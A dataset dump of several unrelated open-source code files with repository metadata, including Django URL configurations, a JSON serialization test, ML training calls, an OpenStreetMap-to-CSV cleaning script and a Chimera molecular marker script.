return next_interval
taskd.TaskDaemon.__taskclss__.append(ClearBillingTask) | [
"sailorhdx@hotmail.com"
] | sailorhdx@hotmail.com |
69414aca6d4d7f0cb5c489d05b25bfc88edba856 | 360a4d5f59a346cec88a5660f2ad464104cb33d3 | /core/urls.py | fdb19830a72d392abb68ebaab202ad3aa517c084 | [] | no_license | kanakan12/airbnb-clone | 48c340f0c7a1f7c35edeb212db81018c5643d663 | 384d02f60d0c80f6c4260a4d7e99ad371ec6d38d | refs/heads/master | 2023-05-04T02:08:19.632764 | 2021-05-25T05:11:22 | 2021-05-25T05:11:22 | 357,159,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from django.urls import path
from rooms import views as room_views
app_name = "core"
urlpatterns = [
# path("", room_views.all_rooms, name="home")
path("", room_views.HomeView.as_view(), name="home")
] | [
"69573636+kanakan12@users.noreply.github.com"
] | 69573636+kanakan12@users.noreply.github.com |
6855129c3297167e5e28f1fd6651378c6bd5b025 | 1370b1061ea2790eef64631f16773e024f8b8133 | /main.py | ad9c7483a1e8ded4b387d34e9671e13190aeed79 | [] | no_license | cbbeyer/reflection | 8d3cdaf16a36627a32e24ef1161748c08784799e | 6a6668248bfcdb2cafd3416d9064bdbe235a6eac | refs/heads/master | 2021-07-25T11:44:44.649474 | 2017-11-04T23:37:48 | 2017-11-04T23:37:48 | 109,190,053 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,813 | py | #!/usr/bin/env python3
from serialize import to_json
import sys
################################################
### Testing objects
class Date(object):
'''A date for a person'''
def __init__(self, year, month, day):
self.year = year
self.month = month
self.day = day
class Franchise(object):
'''A franchise.'''
def __init__(self, name, owner, started):
self.name = name
self.owner = owner
self.started = started
class Person(object):
'''A person'''
def __init__(self, name, gender, birth_date, is_cool, net_worth, debut_year, father, mother, franchise):
self.name = name
self.gender = gender
self.birth_date = birth_date
self.is_cool = is_cool
self.net_worth = net_worth
self.debut_year = debut_year
self.father = father
self.mother = mother
self.franchise = franchise
################################################
### Main method
if __name__ == '__main__':
# person 1
fd1 = Date(1962, 8, 1)
f1 = Franchise('Spiderman', 'Marvel', fd1)
b1 = Date(2011, 2, 3)
p1 = Person('Peter "Spidey" Parker', 'M', b1, False, 15000.00, 1967, None, None, f1)
# person 2
fd2 = Date(1962, 8, 1)
f2 = Franchise('Superman', 'DC\\Comics', fd2)
b2 = Date(2014, 5, 6)
p2 = Person('Lois Lane', 'F', b2, True, 40000.50, 1981, None, None, f2)
# person 3
fd3 = Date(1963, 1, 1)
f3 = Franchise('Doctor Who', 'BBC', fd3)
b3 = Date(2017, 8, 9)
p3 = Person('River Song/Melody Pond', 'F', b3, True, 91234.56, 2001, p1, p2, f3)
# print
with open('output.json', 'w') as f:
orig_stdout = sys.stdout
sys.stdout = f
print(to_json(p3))
sys.stdout = orig_stdout
# print(to_json(p3))
| [
"carsen.beyer@gmail.com"
] | carsen.beyer@gmail.com |
b42572225b6714e3c6f166c62dd809cea5271184 | db855555dddc1f17dc3d5784dbb6f68683fb7175 | /tf_experiments/train_setting_03.py | f130ed2a2c5a607510f6bb76b5f8fba4b4b7af5b | [] | no_license | moligslagers/cnn_server | 063f67c449df8b1e5ab4802e241bd10646ad7ce1 | 6f63b1c7eace1b2b857f3186ed044c2245bf56d4 | refs/heads/master | 2023-04-22T10:41:37.223390 | 2017-07-27T12:19:40 | 2017-07-27T12:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | from tf_experiments import train_setting_from_scratch as train_from_scratch, \
train_setting_from_imagenet as train_from_imagenet, train_setting_from_cars as train_from_cars
bots_setting_03 = ['cars', 'bmw_models', 'car_types', 'seasons']
# train_from_cars.train(3, 'cars', hours=1)
# train_from_imagenet.train(3, 'cars', hours=1)
train_from_scratch.train(3, 'cars', hours=1)
# train_from_cars.train(3, 'bmw_models', hours=1)
train_from_imagenet.train(3, 'bmw_models', hours=1)
train_from_scratch.train(3, 'bmw_models', hours=1)
train_from_cars.train(3, 'car_types', hours=1)
train_from_imagenet.train(3, 'car_types', hours=1)
train_from_scratch.train(3, 'car_types', hours=1)
train_from_cars.train(3, 'seasons', hours=1)
train_from_imagenet.train(3, 'seasons', hours=1)
train_from_scratch.train(3, 'seasons', hours=1)
| [
"m.olig03@googlemail.com"
] | m.olig03@googlemail.com |
74c031d50cf1150eebc7a3381046b4a41296f3e0 | c211a0d57508d2e9168f73c9f3aa8b19bb54e582 | /hummingbot/connector/exchange/dolomite/dolomite_utils.py | 71b6c6de4c1be75f0f3caa04faf1360c4ee17d30 | [
"Apache-2.0"
] | permissive | pulkitsharma/hummingbot | 106ccd3226b082458e7ae279050ebcfbd182f7df | 8695f83a2ffec392083be9ba5be7f0fa5c4dade6 | refs/heads/master | 2022-12-28T19:28:54.430850 | 2020-10-15T04:08:53 | 2020-10-15T04:08:53 | 275,738,351 | 0 | 0 | Apache-2.0 | 2020-09-10T07:16:26 | 2020-06-29T05:24:59 | Python | UTF-8 | Python | false | false | 76 | py | CENTRALIZED = False
EXAMPLE_PAIR = "WETH-DAI"
DEFAULT_FEES = [0, 0.00001]
| [
"victoreni14@gmail.com"
] | victoreni14@gmail.com |
929b88b5412eb718ec7eb9135f8243b831c66224 | a7c43fe60985bcd0c21eb5d95cefd98a6924375e | /accounts/urls.py | f2e0aa8ecdfccb58b540c37fc81a85e47515dafb | [] | no_license | SoumyaRanjanNaik/TimeTableGenerationHelper | 1cb3c13fe8ca610f57796ab0f067676bc14a2cc9 | a76724bd095cee9e1b68e460b1ae4701fb54ea1f | refs/heads/master | 2022-10-23T04:10:52.230928 | 2020-06-16T19:48:00 | 2020-06-16T19:48:00 | 272,745,926 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 578 | py | from django.contrib import admin
from django.urls import path
from accounts.views import *
urlpatterns = [
# path("home/", home, name="home"),
path("faculty_login/", faculty_login, name="faculty_login"),
path("facu;ty_page/", faculty_page, name="faculty_page"),
path("add_faculty/", add_faculty, name="add_faculty"),
path("faculty_logout/", faculty_logout, name="faculty_logout"),
path("admin_login/", admin_login, name="admin_login"),
path("admin_logout/", logout_view, name="admin_logout"),
path("free_list/", free_list, name="free_list"),
]
| [
"srnaik2209@gmail.com"
] | srnaik2209@gmail.com |
12b2ae2377bb9545426fbd1e3fb3a467ac40bf0b | ae6893601b505f0df6014c95d657bfbff854f059 | /pasta-django/cursos/admin.py | 6f63640cbd0046ede2be71af35b92745af46a970 | [
"MIT"
] | permissive | rabeloalcantaraigor/Curso-API-DRF | ff439ec302a740ec6c69e6ae1e274e91bdbfc99f | df613423539a451c67b041b9d606e4525f0b798b | refs/heads/main | 2023-07-17T06:51:14.865047 | 2021-09-02T14:00:04 | 2021-09-02T14:00:04 | 402,443,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | from django.contrib import admin
from .models import Curso, Avaliacao
@admin.register(Curso)
class CursoAdmin(admin.ModelAdmin):
list_display=('titulo', 'url','criacao','atualizacao','ativo')
@admin.register(Avaliacao)
class AvaliacaoAdmin(admin.ModelAdmin):
list_display=('curso','nome','email','avaliacao','criacao','atualizacao','ativo') | [
"37155572+rabeloalcantaraigor@users.noreply.github.com"
] | 37155572+rabeloalcantaraigor@users.noreply.github.com |
491d5db8ca46cee613f835831794a720469c3134 | 434566b26b8da70c7eb516f42843d0cad6fb1d24 | /gfe/urls.py | b0fbc060a17667ab9bc750e67737b99ac5bf3ec9 | [
"BSD-3-Clause",
"CC-BY-3.0",
"CC-BY-2.0",
"MIT"
] | permissive | OpticPotatOS/gfesys | 3e27af6eacdfde92695beb67a4d1b114aa13f8ed | 4415e523ba8d1c546c55dd01ccf18baa0bc8f950 | refs/heads/master | 2021-01-17T05:35:57.150499 | 2016-05-27T08:38:19 | 2016-05-27T08:38:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,996 | py | from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from django.views.generic.base import RedirectView
from page import views
from surlex.dj import surl
from server import views as server_views
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'gfe.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', include('server.urls')),
url(r'^forum', include('spirit.urls')),
url(r'^servers/', include('server.urls', namespace='server')),
url(r'^members/', include('member.urls', app_name="member")),
url(r'^admin/', include(admin.site.urls)),
surl(
'^newsletter/<newsletter_slug:s>/archive/<year:Y>/<month:m>/<day:d>/<slug:s>/$',
server_views.SubmissionArchiveDetailOverrideView.as_view(), name='newsletter_archive_detail_override'
),
url(r'^newsletter/', include('newsletter.urls')),
url(r'^apple-touch-icon-57x57\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-57x57.png', permanent=True)),
url(r'^apple-touch-icon-60x60\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-60x60.png', permanent=True)),
url(r'^apple-touch-icon-72x72\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-72x72.png', permanent=True)),
url(r'^apple-touch-icon-76x76\.png', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-76x76.png', permanent=True)),
url(r'^apple-touch-icon-114x114\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-114x114.png', permanent=True)),
url(r'^apple-touch-icon-120x120\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-120x120.png', permanent=True)),
url(r'^apple-touch-icon-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-144x144.png', permanent=True)),
url(r'^apple-touch-icon-152x152\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-152x152.png', permanent=True)),
url(r'^apple-touch-icon-180x180\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-180x180.png', permanent=True)),
url(r'^apple-touch-icon-precomposed\.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon-precomposed.png', permanent=True)),
url(r'^apple-touch-icon.png$', RedirectView.as_view(url='/static/servers/favicons/apple-touch-icon.png', permanent=True)),
url(r'^favicon-32x32\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-32x32.png', permanent=True)),
url(r'^favicon-96x96\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-96x96.png', permanent=True)),
url(r'^android-chrome-36x36\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-36x36.png', permanent=True)),
url(r'^android-chrome-48x48\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-48x48.png', permanent=True)),
url(r'^android-chrome-72x72\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-72x72.png', permanent=True)),
url(r'^android-chrome-96x96\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-96x96.png', permanent=True)),
url(r'^android-chrome-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-144x144.png', permanent=True)),
url(r'^android-chrome-192x192\.png$', RedirectView.as_view(url='/static/servers/favicons/android-chrome-192x192.png', permanent=True)),
url(r'^favicon-16x16\.png$', RedirectView.as_view(url='/static/servers/favicons/favicon-16x16.png', permanent=True)),
url(r'^manifest\.json$', RedirectView.as_view(url='/static/servers/favicons/manifest.json', permanent=True)),
url(r'^safari-pinned-tab\.svg$', RedirectView.as_view(url='/static/servers/favicons/safari-pinned-tab.svg', permanent=True)),
url(r'^mstile-70x70\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-70x70.png', permanent=True)),
url(r'^mstile-144x144\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-144x144.png', permanent=True)),
url(r'^mstile-150x150\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-150x150.png', permanent=True)),
url(r'^mstile-310x150\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-310x150.png', permanent=True)),
url(r'^mstile-310x310\.png$', RedirectView.as_view(url='/static/servers/favicons/mstile-310x310.png', permanent=True)),
url(r'^favicon\.ico$', RedirectView.as_view(url='/static/servers/favicons/favicon.ico', permanent=True)),
url(r'^browserconfig\.xml$', RedirectView.as_view(url='/static/servers/favicons/browserconfig.xml', permanent=True)),
url(r'^oauth/', include('oauth2_provider.urls', namespace='oauth2_provider')),
url(r'', include('page.urls', app_name="page", namespace='page')),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"magnusjjj@gmail.com"
] | magnusjjj@gmail.com |
aa5ff303cb84f6f6e95af2b35f407decfb78eade | 265051f7cb4e7cd41ba1e4736da154249c93adbd | /laguage/apps.py | 19669f01921fba9aa2807ed58f7dbcaf43f281d5 | [] | no_license | GeofreyMuindeMunguti/zilo-api | af2945b2a2df1cda3d75ae8e179a699633bfbc59 | f3f5512ce0bb397d51ef243e1fd92bd1e2ed7e68 | refs/heads/master | 2023-07-05T09:54:57.115316 | 2021-03-29T22:07:09 | 2021-03-29T22:07:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | from django.apps import AppConfig
class LaguageConfig(AppConfig):
name = 'laguage'
| [
"muinde@mesozi.com"
] | muinde@mesozi.com |
7076a30dc510f868334a16834814d2a9d186743b | 7d7e44e1a040311ed0e77149c25fa506018a7814 | /2_clean_osm_write_csv.py | c049496b7517d6fffa00637a75f373a6c03030d2 | [] | no_license | PetzMcPetz/Data_Wrangling | a97c9ca70669e95d0e0422f8028d56bee8678e31 | 2702f84eb0c8788faf5a4a8eac33237e2fc8bb47 | refs/heads/main | 2023-03-25T18:43:47.100896 | 2021-03-23T22:10:41 | 2021-03-23T22:10:41 | 350,870,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,249 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 18 23:03:59 2021
@author: Michael Rabe
"""
import xml.etree.ElementTree as ET # Use cElementTree or lxml if too slow
from collections import defaultdict
import re
import pprint
import csv
import codecs
import cerberus
import add_help_functions as helper
wiki_path = 'https://de.wikipedia.org/wiki/Verwaltungsgliederung_Berlins#Bezirke'
berlin_dict = helper.get_berlin_district_names(wiki_path)
berlin_dict = helper.reverse_dict(berlin_dict)
#wiki_path ="https://wiki.openstreetmap.org/wiki/DE:Key:cuisine"
#cuisine_dict = helper.get_cuisine_values(wiki_path)
#cuisine_dict = helper.reverse_dict_v2(cuisine_dict)
import add_schema
osm_schema = add_schema.get_schema()
#OSMFILE = "Berlin_OSM_v2_k20.osm"
OSMFILE = "Berlin_OSM_v2.osm"
lower_colon = re.compile(r'^([a-z]|_)+:([a-z]|_)+')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
NODES_PATH = "nodes.csv"
NODE_TAGS_PATH = "nodes_tags.csv"
WAYS_PATH = "ways.csv"
WAY_NODES_PATH = "ways_nodes.csv"
WAY_TAGS_PATH = "ways_tags.csv"
NODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']
NODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']
WAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']
WAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']
WAY_NODES_FIELDS = ['id', 'node_id', 'position']
###############################################################################
def get_type_and_key(entry):
entry_type = 'regular'
entry_key = entry
temp_list = entry_key.split(":")
if len(temp_list)>1:
entry_type = temp_list[0]
entry_key = ":".join(temp_list[1:])
return (entry_type, entry_key)
###############################################################################
def is_suburb_name(elem):
return (elem.attrib['k'] == "addr:suburb")
def upd_suburb(inp_dict, value):
''' function to harmonize "addr:suburb" values
:param inp_dict: reversed berlin dictionary extracted from wiki
:param value: is the "addr:suburb" value
'''
try:
value = inp_dict[value]
except:
print ("value not found:",value)
return value
###############################################################################
cuisine_mapping = { "coffee_shop": ["coffee"],
"barbecue":['bbq'],
"arab":["arabic"],
"israeli":['isreali'],
"italian":['italian_pizza'],
"burrito":['burritos']
}
cuisine_dict = helper.reverse_dict_v2(cuisine_mapping)
def is_cuisine(elem):
return (elem.attrib['k'] == "cuisine")
def upd_cuisine(inp_dict, value):
''' function to harmonize "cusine" values
:param inp_dict: cuisine_dict > reversed cuisine_mapping dict
:param value: is the "cuisine" value
Step1: Split value in a list by semicolon
Step2: Loop trough the list and correct the value if necessary
Step3: Check if corrected value already in the list. If yes drop the list index.
'''
value_list = value.split(";") # Step 1
value_list = [i.strip() for i in value_list]
for i in range(0,len(value_list)):
entry = value_list[i]
if entry in inp_dict.keys():# Step2
new_entry = inp_dict[entry]
if new_entry not in value_list: #Step3
value_list[i] = new_entry
else:
value_list.pop(i)
return value_list
###############################################################################
def shape_element(element):
node_attribs = {}
way_attribs = {}
way_nodes = []
tags = []
store_dict={}
format_list_int = ['id', 'changeset', 'uid']
format_list_float = ['lat', 'lon']
for key in element.attrib.keys():
if key in format_list_int:
store_dict[key]=int(element.attrib[key])
elif key in format_list_float:
store_dict[key]=float(element.attrib[key])
else:
store_dict[key]=str(element.attrib[key])
counter = 0
for child in element:
if child.tag == "tag":
entry_key = child.attrib['k']
entry_value = child.attrib['v']
if problemchars.search(entry_key):
print (entry_value, "found")
continue
entry_type, entry_key = get_type_and_key(entry_key)
if is_suburb_name(child):
entry_value = upd_suburb(berlin_dict, entry_value)
loop_list=[entry_value]
if is_cuisine(child):
loop_list = upd_cuisine(cuisine_dict, entry_value)
for entry_value in loop_list:
tags.append({"id": store_dict['id'],
"key": entry_key,
"value":entry_value ,
"type":entry_type})
elif child.tag == "nd":
node_id = int(child.attrib['ref'])
way_nodes.append({'id': store_dict['id'],
'node_id': node_id,
'position': counter})
counter+=1
if element.tag == 'node':
node_attribs = store_dict
return {'node': node_attribs, 'node_tags': tags}
elif element.tag == 'way':
way_attribs=store_dict
return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}
###############################################################################
def validate_element(element, validator, schema=osm_schema):
"""Raise ValidationError if element does not match schema"""
if validator.validate(element, schema) is not True:
field, errors = next(validator.errors.iteritems())
message_string = "\nElement of type '{0}' has the following errors:\n{1}"
error_string = pprint.pformat(errors)
raise Exception(message_string.format(field, error_string))
###############################################################################
def process_map(osm_file, validate):
with codecs.open(NODES_PATH, 'w',encoding='utf-8') as nodes_file, \
codecs.open(NODE_TAGS_PATH, 'w',encoding='utf-8') as nodes_tags_file, \
codecs.open(WAYS_PATH, 'w',encoding='utf-8') as ways_file, \
codecs.open(WAY_NODES_PATH, 'w',encoding='utf-8') as way_nodes_file, \
codecs.open(WAY_TAGS_PATH, 'w',encoding='utf-8') as way_tags_file:
nodes_writer = csv.DictWriter(nodes_file, NODE_FIELDS)
node_tags_writer = csv.DictWriter(nodes_tags_file, NODE_TAGS_FIELDS)
ways_writer = csv.DictWriter(ways_file, WAY_FIELDS)
way_nodes_writer = csv.DictWriter(way_nodes_file, WAY_NODES_FIELDS)
way_tags_writer = csv.DictWriter(way_tags_file, WAY_TAGS_FIELDS)
nodes_writer.writeheader()
node_tags_writer.writeheader()
ways_writer.writeheader()
way_nodes_writer.writeheader()
way_tags_writer.writeheader()
elem_list=["node","way"]
validator = cerberus.Validator()
for event, element in ET.iterparse(osm_file, events=("end",)):
if element.tag in elem_list:
el = shape_element(element)
if el:
if validate is True:
None
validate_element(el, validator)
if element.tag == 'node':
nodes_writer.writerow(el['node'])
node_tags_writer.writerows(el['node_tags'])
elif element.tag == 'way':
ways_writer.writerow(el['way'])
way_nodes_writer.writerows(el['way_nodes'])
way_tags_writer.writerows(el['way_tags'])
if __name__ == '__main__':
#test()
process_map(OSMFILE, validate=True) | [
"petz@quantentunnel.de"
] | petz@quantentunnel.de |
cb680713f62e5a02875dde5bcc3b991f790d8eea | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_8955.py | 527f9c63569aea386912716fa659f2f8a46cb7f2 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,839 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((494.355, 367.125, 618.791), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((530.442, 401.486, 572.52), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((583.34, 432.922, 517.736), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((588.793, 296.393, 548.012), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((687.495, 547.315, 400.156), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((526.348, 391.42, 595.607), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((526.158, 391.048, 596.895), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((519.373, 404.513, 620.584), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((545.248, 413.559, 613.651), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((570.959, 401.07, 613.637), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((585.251, 393.25, 637.761), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((582.632, 397.261, 666.569), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((498.909, 388.009, 602.56), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((660.452, 407.68, 740.286), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((712.029, 522.925, 582.455), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((712.029, 522.925, 582.455), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((683.896, 528.04, 584.816), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((656.119, 521.256, 581.863), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((631.645, 506.27, 579.738), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((609.496, 487.603, 579.55), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((588.485, 467.51, 580.572), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((568.85, 445.881, 581.332), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((803.878, 451.525, 686.828), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((327.354, 426.514, 485.705), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((564.085, 463.738, 548.335), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((564.085, 463.738, 548.335), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((570.054, 435.652, 548.879), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((581.715, 410.031, 541.822), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((586.143, 398.93, 515.638), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((510.396, 325.34, 581.286), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((662.389, 469.061, 444.913), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((531.698, 373.097, 569.825), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((531.655, 372.726, 569.786), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((549.62, 367.461, 591.423), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((551.204, 373.587, 619.222), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((551.362, 392.47, 640.258), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((563.304, 418.177, 640.91), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((553.102, 441.461, 651.78), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((562.506, 423.833, 673.091), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((516.535, 463.351, 612.193), (0.21, 0.49, 0.72), 18.4716)
